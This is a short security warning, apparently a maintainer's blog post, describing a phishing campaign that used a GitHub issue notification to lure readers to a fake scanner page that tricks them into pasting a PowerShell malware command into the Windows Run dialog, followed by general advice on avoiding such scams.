Yesterday, I got an innocent looking email from a github issue on the IPBan github repository. Here’s a screenshot. Please don’t type the url into your browser.
This email passed all dkim checks and was legitimately sent by github, with the “view on github” and “unsubscribe” links correct. The url for github scanner? Malicious. When I opened it in my throw-away VM, it contained a button, that when clicked, copied a powershell command to the clipboard to install malware, then provided instructions to use windows run command and ctrl-v to paste it in, installing the virus. Laughing at the audacity of these hackers, I tore down the VM.
When I read the first line, “Hey there!” I was immediately suspicious. As a test, I created a new github issue, #313, and verified the attackers had deleted the previous issue, #312 to cover their tracks.
As a reminder, if you are not 100% sure of ANY url, whether it be in an email, website, or elsewhere, DON’T click it unless you are 100% sure it’s safe.
Modern browsers will ask for javascript permissions to read/write on the clipboard, so keep your operating system and browser patched to the latest versions, and only allow permissions for websites you trust. Having a virus scanner as a last line of defense is also important, but not a guarantee of your safety. Always be cautious, take your time, and never rush to click things or fill out forms.
More details on this reddit thread.